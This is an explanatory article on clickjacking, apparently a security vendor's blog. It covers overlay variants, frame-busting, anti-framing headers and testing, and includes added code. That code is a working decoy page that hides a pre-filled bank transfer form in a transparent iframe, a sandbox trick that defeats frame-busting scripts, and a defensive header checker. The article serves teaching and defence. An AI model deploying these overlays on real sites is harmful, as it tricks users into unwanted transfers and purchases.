What are Clickjacking Attacks? Tips to Prevent Them
Clickjacking attacks trick the user into clicking, without realising it, on a webpage element that is invisible or disguised as another element. Because a clickjacking attack does not compromise the website's own infrastructure, businesses might not take the vulnerability seriously. However, the attack harms the site's users, and only the site operator can protect them, through robust clickjacking prevention measures. Businesses that do not take such measures are risking their brand value and business continuity.
Let us dive into this attack type and understand how to prevent them.
What are Clickjacking Attacks?
In a clickjacking attack, the attacker captures the user's clicks through UI tricks that make the user believe they are performing an action they intend. These attacks are also known as User Interface (UI) redressing. Most clickjacking attacks rely on loading the target page in an HTML iframe on a page the attacker controls, which is why most protection methods focus on preventing the page from being framed.
An example of how clickjacking works in real life
- The attacker crafts a website that promises attractive offers or free gifts.
- In the background, the attacker's page loads the bank transfer or e-commerce checkout page of a site the user is likely to be logged into. If that page pre-fills its form from query parameters, the attacker's URL supplies the attacker's own account or delivery details.
- The target page is loaded in a fully transparent iframe stacked on top of the visible malicious page.
- The iframe is positioned so that the target's controls, such as Confirm Transfer or Confirm Purchase, sit exactly over the visible items on the malicious site, such as Claim Gift, Claim Offer or Book Your Free Trip.
- When the user clicks one of these items, the click lands in the invisible frame and confirms the transfer or purchase.
- Unaware of the transfer or purchase that happened in the background, the user is then shown the page with the promised offer or gift.
- From the target site's point of view the action was performed by a legitimately signed-in user from their own browser session, so the transaction looks like an ordinary request. Little on the target site points back to the attacker other than the destination account or delivery details themselves.
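As an added illustration of the steps above (not code from the original article), here is what the attacker's decoy page could look like. It assumes a hypothetical target at https://bank.example/transfer that pre-fills the recipient and amount from query parameters, that its Confirm Transfer button sits 220 px from the top and 40 px from the left of that page, and that the target sends no anti-framing header. The iframe offsets are computed so the hidden button lands exactly under the visible one; while aligning it, an attacker would set the opacity to a small non-zero value to see both layers.

```html
<!-- Added example, not from the original article. All URLs, accounts and
     pixel offsets are assumptions; serve it only from a test origin you own. -->
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Claim your free trip</title>
  <style>
    body { margin: 0; font-family: sans-serif; }
    /* The decoy button the victim believes they are clicking. */
    #decoy {
      position: absolute; top: 300px; left: 100px;
      padding: 12px 24px; font-size: 18px; background: #e33; color: #fff;
    }
    /* The real target, stacked above the decoy but fully transparent.
       The frame is offset so the bank's Confirm button (assumed at 40px,220px
       inside the framed page) lands exactly on the decoy at (100px,300px). */
    #target {
      position: absolute;
      top: 80px;    /* 300 - 220 */
      left: 60px;   /* 100 - 40  */
      width: 800px; height: 600px;
      border: 0;
      opacity: 0;   /* set to 0.3 while aligning, 0 for the real attack */
      z-index: 2;   /* above the decoy, so the click goes into the frame */
    }
  </style>
</head>
<body>
  <h1>Congratulations! You have won a free trip.</h1>
  <button id="decoy">Book Your Free Trip</button>
  <!-- Hypothetical target that pre-fills the transfer form from the query string.
       The sandbox attribute keeps the victim's session and forms working but
       withholds allow-top-navigation, so a frame-busting script in the target
       cannot break out of the frame. -->
  <iframe id="target"
          src="https://bank.example/transfer?to=ATTACKER-ACCOUNT&amount=1000"
          sandbox="allow-forms allow-scripts allow-same-origin"></iframe>
</body>
</html>
```

The same layout works for any target control, only the two offsets change; if the target sends X-Frame-Options or a Content-Security-Policy frame-ancestors directive that excludes the attacker's origin, the browser refuses to render the frame and the decoy click does nothing.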
Types of Clickjacking Attacks
Based on the nature of the specific operation (a few of the variants are listed below):
- Likejacking: To hijack clicks for likes on Facebook and other social media platforms
- Cookiejacking: the attacker steals cookies stored in the browser, typically by tricking the user into dragging and dropping cookie content out of a hidden frame, and can then perform actions on the targeted website on the user's behalf
- Filejacking: the attacker tricks the user into selecting local files or a folder in a disguised file-chooser dialog, giving the attacker's page access to the user's local files
- Cursorjacking: the attacker displays a fake cursor offset from the real one, so that the user's real clicks land where the attacker wants them rather than where the user sees the cursor
- Password manager attacks: the attacker places invisible login forms on the page or in frames so that the password manager's auto-fill feature fills credentials into fields the attacker controls
Based on the type of overlay/ embedding used:
- Complete Transparent Overlay
- Hidden Overlay
- Click Event Cropping
- Rapid Content Replacement
- Drag and Drop
Unaware that they are actually clicking on the target website, users could unknowingly:
- download malware
- visit fraudulent/ malicious web pages
- provide credentials/ sensitive information
- transfer money
- purchase products and so on
A motivated attacker may leverage clickjacking vulnerabilities to:
- harvest login credentials
- spread worms and malware on social media sites
- spread malware in systems and networks through downloads
- promote online scams
- trick users into giving access to local files, password managers, web camera, microphone, etc
Frame busting is one of the most common client-side methods of clickjacking prevention: a script on the page checks whether it is running in the top-level window and, if not, tries to break out of the frame. Although effective in some cases, this method is error-prone and can be bypassed, for example by loading the page in an iframe whose sandbox attribute withholds the permission to navigate the top window.
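As an added illustration (not from the original article), the naive frame-busting script as commonly deployed, followed by the attacker-side markup that defeats it. The target URL is a hypothetical placeholder.

```html
<!-- Added example, not from the original article. The first part goes in the
     <head> of the page that wants protection; the second is the attacker's page. -->

<!-- Protected page: naive frame busting. -->
<script>
  // If this document is not the top-level window, replace the top window with it.
  if (top !== self) {
    top.location = self.location;
  }
</script>

<!-- Attacker page: the sandbox attribute grants scripts, forms and the page's own
     origin (so the victim's session cookies still apply) but not
     allow-top-navigation, so the assignment to top.location inside the frame is
     blocked and the framed page stays in place, fully clickable. -->
<iframe src="https://bank.example/transfer"
        sandbox="allow-scripts allow-forms allow-same-origin"></iframe>
```

A more robust variant hides the body with CSS first and only reveals it after the script confirms it is top-level, so a blocked navigation leaves nothing to click; even so, the script runs only after the page has loaded and can be disabled by the sandbox entirely (omit allow-scripts), which is why the header-based protections below are preferred.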
Server-side methods, that is, HTTP response headers that tell the browser whether the page may be rendered in a frame, are trusted and recommended by security experts for clickjacking protection.
- X-Frame-Options
A common server-side method is the X-Frame-Options header. Sent as part of the HTTP response for a page, it tells the browser whether it may render that page inside a <frame>, <iframe>, <embed> or <object> element.
The header takes one of three values:
- DENY: the page may not be displayed in a frame by any site, including its own
- SAMEORIGIN: the page may be displayed in a frame only by pages from the same origin
- ALLOW-FROM uri: the page may be displayed in a frame only by the single specified origin. This value is obsolete: current browsers do not support it and treat the header as invalid, so a page protected only by ALLOW-FROM is frameable in them
X-Frame-Options is still worth sending for older browsers, but it cannot express an allow-list of several origins, so it is insufficient for sites whose pages must be framed from multiple domains; those cases need the Content-Security-Policy frame-ancestors directive.
- Content Security Policy
The Content-Security-Policy HTTP header (a W3C standard implemented by browsers, separate from HTML5) lets website authors allow-list the origins from which resources may be loaded. Its frame-ancestors directive lists the origins that may embed the page: 'none' blocks all framing, 'self' permits only the same origin, and explicit origins or wildcard hosts may be listed. When a response carries both headers, a browser that supports frame-ancestors ignores X-Frame-Options. This gives wider and more precise protection than the X-Frame-Options header, and the two are usually sent together so that older browsers still get the X-Frame-Options fallback.
Whether a website is vulnerable to clickjacking can be gauged by testing. The tester tries to include a sensitive page from the website in an iframe on a page served from a different origin and checks whether the browser renders it; if the page appears and can be interacted with, it is vulnerable. The tester also inspects the response headers for X-Frame-Options and a Content-Security-Policy frame-ancestors directive, and tests the strength of whatever anti-clickjacking measures the site relies on, for example by trying to bypass frame-busting scripts.
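As an added example (not code from the original article or from any product), the following Node.js script encodes the X-Frame-Options and frame-ancestors rules above so a tester can evaluate captured response headers offline. It assumes headers are supplied as a plain object, as collected with a proxy or curl -I, that origins are written as scheme://host[:port], and that https://bank.example, https://partner.example.com and https://attacker.example are hypothetical origins; it ignores the obsolete ALLOW-FROM value, as current browsers do, and gives a CSP frame-ancestors directive precedence over X-Frame-Options.

```javascript
// Added example, not from the original article. Evaluates a page's anti-framing
// headers the way a current browser does, so a tester can tell from the
// response headers alone whether a given origin could frame the page.
// All origins and sample headers below are constructed for illustration.

// Extract the source list of the frame-ancestors directive, or null if the
// CSP header is absent or has no such directive.
function parseFrameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// Does one frame-ancestors source expression permit `ancestorOrigin`?
function sourceMatches(source, ancestorOrigin, pageOrigin) {
  if (source === "'none'") return false;
  if (source === "'self'") return ancestorOrigin === pageOrigin;
  if (source === '*') return true;
  const anc = new URL(ancestorOrigin);
  let host = source;
  const schemeMatch = source.match(/^([a-z][a-z0-9+.-]*):(?:\/\/(.*))?$/);
  if (schemeMatch) {
    if (anc.protocol !== schemeMatch[1] + ':') return false;
    if (schemeMatch[2] === undefined) return true; // scheme-only source such as https:
    host = schemeMatch[2];
  }
  host = host.replace(/\/.*$/, ''); // frame-ancestors matches host[:port], not path
  if (host.startsWith('*.')) return anc.hostname.endsWith(host.slice(1));
  return anc.host === host;
}

// Would a page at `pageOrigin`, served with `headers`, render inside a frame on
// `ancestorOrigin`? A frame-ancestors directive takes precedence over
// X-Frame-Options. ALLOW-FROM is obsolete and ignored by current browsers, so
// it, a missing header, or an unrecognised value all count as no enforcement.
function mayBeFramedBy(headers, pageOrigin, ancestorOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const ancestors = parseFrameAncestors(h['content-security-policy']);
  if (ancestors) {
    return ancestors.some((src) => sourceMatches(src, ancestorOrigin, pageOrigin));
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return ancestorOrigin === pageOrigin;
  return true;
}

// One-word verdict for a report: can an arbitrary third-party origin frame the page?
function verdict(headers, pageOrigin) {
  const thirdParty = 'https://attacker.example'; // constructed probe origin
  if (mayBeFramedBy(headers, pageOrigin, thirdParty)) return 'vulnerable';
  return mayBeFramedBy(headers, pageOrigin, pageOrigin) ? 'restricted' : 'denied';
}

// Constructed sample responses for a hypothetical https://bank.example/transfer
const PAGE = 'https://bank.example';
const samples = {
  noHeader: {},
  deny: { 'X-Frame-Options': 'DENY' },
  sameOrigin: { 'x-frame-options': 'sameorigin' },
  allowFromOnly: { 'X-Frame-Options': 'ALLOW-FROM https://partner.example.com' },
  cspList: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://partner.example.com" },
  cspOverridesXfo: { 'X-Frame-Options': 'SAMEORIGIN', 'Content-Security-Policy': "frame-ancestors 'none'" },
};

for (const [name, headers] of Object.entries(samples)) {
  console.log(name.padEnd(16), verdict(headers, PAGE));
}
```

The sample set shows the two cases a tester most often gets wrong: a header carrying only ALLOW-FROM reports as vulnerable, because no current browser enforces it, and a response whose X-Frame-Options says SAMEORIGIN but whose CSP says frame-ancestors 'none' reports as denied even for the site's own pages, because the CSP directive wins.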
Intuitive and Managed Web Application Security Solution
Given that attackers leverage vulnerabilities in websites to clickjack, deploying a holistic, intelligent, and managed security solution like AppTrana is indispensable.
Clickjacking protection is directly linked to user trust and loyalty. So, businesses must take clickjacking attack prevention seriously and proactively protect their users.